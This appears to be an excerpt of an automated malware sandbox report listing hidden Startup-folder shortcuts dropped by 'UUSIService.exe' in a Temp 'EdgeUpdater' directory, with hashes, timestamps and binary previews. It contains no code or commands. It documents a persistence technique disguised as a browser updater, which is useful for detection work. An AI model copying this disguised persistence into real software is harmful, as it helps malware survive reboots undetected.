Preview:	L..................F...."...........z..G....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........Z..G........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_cd1906435c8a4f349e226615398c886c.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:20 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.924394851201189
Encrypted:	false
SSDEEP:	24:8ZOLHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8kHfNDp2l9tJRBzfNZ47/yg
MD5:	FF521957180949D694DFF00378380891
SHA1:	0E169D26F2A1875DCA2015128AE9799BD4F9E50B
SHA-256:	974DD67751A2407982A3E8403C67ACBBD0A9E601A413043EFD934130535463FE
SHA-512:	DE9A4BAFBE9E8AD238FC4A302BC5DA2B3AA7FC0E72DEE8A43A0D0C08A7EC4E2E046D37BE8757B6737B813DA6E4D4E36F7F73EE407A0F38E4526BD432441FF290
Malicious:	false
Preview:	L..................F...."...........f.4"....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_cf2ee3df532d40ce84524d91d76ef01d.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:05 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.922253060285898
Encrypted:	false
SSDEEP:	24:8ZiHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8YHfNDp2l9tJRBzfNZ47/yg
MD5:	69554F2E664881910E99DAABD04E9330
SHA1:	841B4FED3732321CFE81128C7C60EC04F4791DE9
SHA-256:	4D1F62A6A8CC20E7FA66AA8BB179616DAA31862A10D2E9A5DC3BEAF9D2B2570C
SHA-512:	88C3DBEEB303192F5448E76C086D5CA5F717454E3F70845519BF19D84DAAD09C1119071F2F4C5FA8E8CAE2098F10AC07CCA506B4016EE9301A78A34A5F4CB162
Malicious:	false
Preview:	L..................F...."...........X.......0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_cf6e768d83504551ae0a5cebe22a6e8d.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:19 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.918198143058996
Encrypted:	false
SSDEEP:	24:8ZODHZDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:88HZDp2l9tJRBzfNZ47/yg
MD5:	90D53E76257748B08A738172F06DCC90
SHA1:	22AF5D9C18EF4EEEBD6D79EFB151B0F0E041C99F
SHA-256:	02A8C959BE83BE1BB1E1FC6B73AEA9FEB5E6699014075F9ECF5554F208166540
SHA-512:	EEA2C7F5EE62A4A7A5FD12EA7D277E9DF53546A1E2D50177C9BF44868F12CD32E789A36E03D1AB5BEECA4C32122335CA0F9345637F3D76F3007EE3560D57C26D
Malicious:	false
Preview:	L..................F...."...........!.(E....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S...........-.E........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_d14c8ce632cd47cf81d96e8c1fc7bc42.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:38 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.921376797454702
Encrypted:	false
SSDEEP:	24:8ZWLHyDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8gLHyDp2l9tJRBzfNZ47/yg
MD5:	76677B4936B91BA3369C312C4C908F01
SHA1:	32504E72A1732D814509061733168CFF6D5A2E23
SHA-256:	F52E79505EB7C78F64C565D8EF89B3DCF0B77DF2E73936409561FD2B9DAB3389
SHA-512:	2B289F0D004E25684CD43CC1CE3C91FDDF0F80998D25A0C22088420FAEDDFD24A3D5D51CD8E9AC8344BEE4ABD611B35290603678DF3F0B1E79FA220468428320
Malicious:	false
Preview:	L..................F...."............/.P....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S.............P........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_d3145aa6b3734b18871d6250fe6aa172.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:43 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.926871480239231
Encrypted:	false
SSDEEP:	24:8Zj6HfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8MHfNDp2l9tJRBzfNZ47/yg
MD5:	930B4482101D2DEC27DF53BFA6154A66
SHA1:	62D0A97B194AE98D552ACB523C31D0252F4DE7E8
SHA-256:	4F89631F94E75D61EDD9DD5AFFCF8C673BFC88F17821A201BFB9CC0C1A12370E
SHA-512:	3E4B8655736822B9B812A0FBB6190DE0D53435FB815D26C7702074CD833FF4D6EDA055426BE717D1A57505B35C9EA5322CBEF95CA539DBFF24A3FC66FB49AA6D
Malicious:	false
Preview:	L..................F...."............../....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_d688a1f8ca524c3fb3a2e04be22b53c2.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:22 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.9249731881130865
Encrypted:	false
SSDEEP:	24:8ZeHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8YHfNDp2l9tJRBzfNZ47/yg
MD5:	1509F0B9D80D4FFBCF94A097C80A8159
SHA1:	3821372B8E3AE03D961EFEE04BFF30BDDA2E7CC7
SHA-256:	7FEC5409155606FDD4EBE90687A82A53DDB83265D2055BA9429B8A90D456BCD7
SHA-512:	E959CC362C450DD850FF434A0419CFC5FB9A678CE1E73362261027534C19C68092451EB07550FB70655CD7673695AF9BB4306ED5AD9A2A2D7A0AC98EC6266254
Malicious:	false
Preview:	L..................F...."............lh#....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_d89d93ad90584b91ae549a36acedc2b1.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:35 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.9257247362708725
Encrypted:	false
SSDEEP:	24:8Z6H6Dp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:80H6Dp2l9tJRBzfNZ47/yg
MD5:	ADE7A511F5ACCA4C25FF0A12640F9C8F
SHA1:	1AC8391DED960A873350C467D5A2AE146BAC59CA
SHA-256:	A6988EC7961923F15060F2ED44B792F48C689683C45321153E3F8972FAB81E20
SHA-512:	F8704B3786B56B023F3155D19319293C595BA9E89656C8B13ACC366D6CF909F6E20FA2321856EB366F40A051768D457914F6569951B6FB3990FE5DA72486FDA1
Malicious:	false
Preview:	L..................F...."...........N..N....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S.............N........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_df6b6271267e439c98dbfac211279850.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:09 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.92061168893633
Encrypted:	false
SSDEEP:	24:8ZnHJcDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8NHeDp2l9tJRBzfNZ47/yg
MD5:	D719FE2212C912AB38421386A7FE4F73
SHA1:	FA1F8C546304EE70199470201445C649A20998BC
SHA-256:	545B4D69F0B48E5F90D4DA51DE89212C7D01076C0E0B592C90E93E3B956443CC
SHA-512:	C5E23D6CC8A9201ECEF053FF6312B38012C84CEDF4681485E6BF450BA08FE42F85CF30B94F0C35B9959483B9237E5D385DA0327139C1FF61B329FB48C9E8061B
Malicious:	false
Preview:	L..................F...."...........c.l?....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........`..@........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_e0a50b3275ac4904945f226a45d7c33e.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:20 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.920507353035662
Encrypted:	false
SSDEEP:	24:8Z7HZDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8dHZDp2l9tJRBzfNZ47/yg
MD5:	04E6FABE5B245E7C736270C8C058156B
SHA1:	A8C110EFD7359258D39D44DA12E9E2C28AC48E8F
SHA-256:	CD1A9D971087FA54482B1A099B07E91C7C9EF63D0E028D1D228AB464CFD3F9CD
SHA-512:	4899E5CF0D783D0B86A0366BBBA3F2247FF28991CFA103251138F296A56FCFAF9588DA979CF7CD5A2BA3B1DC59506F05D0B9DFF4DBD7754851D433828F480651
Malicious:	false
Preview:	L..................F....".............E....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S...........-.E........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_e4a26e83483f46279dce2ec0377d0587.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:00 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.919211900373016
Encrypted:	false
SSDEEP:	24:8ZDH5Dp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8tH5Dp2l9tJRBzfNZ47/yg
MD5:	D309165F78C8D338B02B01AE6CCDBEF3
SHA1:	A488AB9E7203141F7D278CDBB2FB3023E337C120
SHA-256:	D705BB1DCDA1918F1E6E17F49CBF77997C060167EB4A42A0A8C120509D0A03E9
SHA-512:	4C7958F2B5F751E2AF445854F309CEDBAB923EE17F1B05BC94F89650ABDB2BD65FE4C52E0D7409EE823877EA28F30FC01964AE5AF7136F4A337A787D8AD2FE45
Malicious:	false
Preview:	L..................F....".............9....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........\.{8........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_e5f04cf0df234c0aab8a48e6f7813fa9.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:47 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.923180119742096
Encrypted:	false
SSDEEP:	24:8ZgLHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8mLHfNDp2l9tJRBzfNZ47/yg
MD5:	0B2BB6D726C0647517EE7625C1FE8773
SHA1:	88F94B6679DB78E71297ED757283EB2A1A5820B9
SHA-256:	75536A955211CE7B62562507F7D3B646A3CF6382E367F8AA4C717AC2E6FA06B8
SHA-512:	70CEF98D1E254638C0AB2D38B6C901D5F18539473216994F107D7970B194A2CB1AF49B341B7B3DD63758D436A767CA0FC1E94456377ECA95C8EE4E321912C386
Malicious:	false
Preview:	L..................F...."..............2....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_e6416737b21b48a9894f7b49e7550b71.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:58 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.921431072964372
Encrypted:	false
SSDEEP:	24:8ZBH5Dp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:83H5Dp2l9tJRBzfNZ47/yg
MD5:	B548300F74C69EE6EE996DF3379D84ED
SHA1:	BAF0A98322CE8DE848D4AE7434C554E0161A5D4E
SHA-256:	A3CEA38D1588B54EE52AAA10A664B7BF5416183B15080318D9747668CA47E755
SHA-512:	82441AD2A13C7395AD40F80895C9018786F0A0C993BD3CDBA11A2FCEA00D93EB6E1DC03E13EAC8C73118478EEC05092E66A9A3DE65B1BE7533C87E7874E3B1DB
Malicious:	false
Preview:	L..................F...."............8~8....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........\.{8........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_e892251fda954bb5b9ddb3d046567a8a.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:43 2024, mtime=Fri Oct 11 07:17:43 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1198
Entropy (8bit):	4.916608838705692
Encrypted:	false
SSDEEP:	24:8pCfNDp2lXttXZRelgK9kztZ/slKnGA8a2lzkIe1qygm:8YfNDp2l9tJRBzf/US52lTyg
MD5:	A39CB302617904EE3C650835647AD98B
SHA1:	6DD6BB5959EA61CA8A05987BDDF9CF2666C1371D
SHA-256:	7C3F89A04D38C903C5C3055F660DDD49CB74585E93B52DDEA87ECEEBCF1BB68A
SHA-512:	ED6309C9ABF2844C50CA328F385D370160C0494D80C6E0D0DF922C342837191A93589607811EE9F2A00C3489BF150D792EE968BABEF52DC45FC14747FE4D0268
Malicious:	false
